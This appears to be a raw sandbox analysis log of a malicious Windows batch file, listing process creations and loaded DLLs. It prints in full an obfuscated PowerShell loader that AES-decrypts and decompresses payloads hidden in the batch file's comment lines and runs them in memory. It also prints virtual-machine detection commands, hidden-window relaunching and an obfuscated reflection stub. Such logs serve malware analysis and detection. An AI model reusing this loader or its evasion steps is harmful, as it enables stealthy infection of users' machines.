Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$cnt-onimai2\$cnt-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86}
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$cnt-onimai2\$cnt-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86}Jump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
